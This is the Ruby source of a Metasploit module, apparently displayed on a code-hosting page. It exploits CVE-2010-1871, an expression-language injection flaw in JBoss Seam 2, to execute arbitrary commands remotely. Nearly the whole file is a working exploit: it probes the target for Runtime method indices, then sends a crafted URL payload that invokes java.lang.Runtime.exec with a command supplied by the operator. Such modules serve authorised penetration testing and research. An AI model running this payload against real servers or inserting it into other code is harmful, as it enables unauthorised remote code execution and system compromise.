Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'JBoss Seam 2 Remote Command Execution',
14
        'Description' => %q{
15
          JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform
16
          4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression
17
          Language (EL) expressions, which allows remote attackers to execute arbitrary code
18
          via a crafted URL. This modules also has been tested successfully against IBM
19
          WebSphere 6.1 running on iSeries.
20

21
          NOTE: this is only a vulnerability when the Java Security Manager is not properly
22
          configured.
23
        },
24
        'Author' => [
25
          'guerrino di massa', # Metasploit module
26
          'Cristiano Maruti <cmaruti[at]gmail.com>' # Support for IBM Websphere 6.1
27
        ],
28
        'License' => MSF_LICENSE,
29
        'References' => [
30
          [ 'CVE', '2010-1871' ],
31
          [ 'OSVDB', '66881']
32
        ],
33
        'DisclosureDate' => '2010-07-19'
34
      )
35
    )
36

37
    register_options(
38
      [
39
        Opt::RPORT(8080),
40
        OptString.new('TARGETURI', [ true, 'Target URI', '/seam-booking/home.seam']),
41
        OptString.new('CMD', [ true, 'The command to execute.'])
42
      ]
43
    )
44
  end
45

46
  def run
47
    uri = normalize_uri(target_uri.to_s)
48
    cmd_enc = ''
49
    cmd_enc << Rex::Text.uri_encode(datastore['CMD'])
50

51
    flag_found_one = 255
52
    flag_found_two = 255
53

54
    uri_part_1 = "?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()["
55
    uri_part_2 = "].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()["
56
    uri_part_3 = "].invoke(null),'"
57

58
    25.times do |index|
59
      req = uri + uri_part_1 + index.to_s + ']}'
60

61
      res = send_request_cgi(
62
        {
63
          'uri' => req,
64
          'method' => 'GET'
65
        }, 20
66
      )
67

68
      if (res && res.headers['Location'] =~ (/java.lang.Runtime.exec%28java.lang.String%29/))
69
        flag_found_one = index
70
        print_status('Found right index at [' + index.to_s + '] - exec')
71
      elsif (res && res.headers['Location'] =~ (/java.lang.Runtime\+java.lang.Runtime.getRuntime/))
72
        print_status('Found right index at [' + index.to_s + '] - getRuntime')
73
        flag_found_two = index
74
      else
75
        print_status('Index [' + index.to_s + ']')
76
      end
77
    end
78

79
    if (flag_found_one != 255 && flag_found_two != 255)
80
      print_status('Target appears VULNERABLE!')
81
      print_status('Sending remote command:' + datastore['CMD'])
82

83
      req = uri + uri_part_1 + flag_found_one.to_s + uri_part_2 + flag_found_two.to_s + uri_part_3 + cmd_enc + "')}"
84

85
      res = send_request_cgi(
86
        {
87
          'uri' => req,
88
          'method' => 'GET'
89
        }, 20
90
      )
91

92
      if (res && res.headers['Location'] =~ (/pwned=java.lang.UNIXProcess/))
93
        print_good('Exploited successfully')
94
      else
95
        print_error('Exploit failed')
96
      end
97
    else
98
      print_error('Target appears not vulnerable!')
99
    end
100
  end
101
end
102

103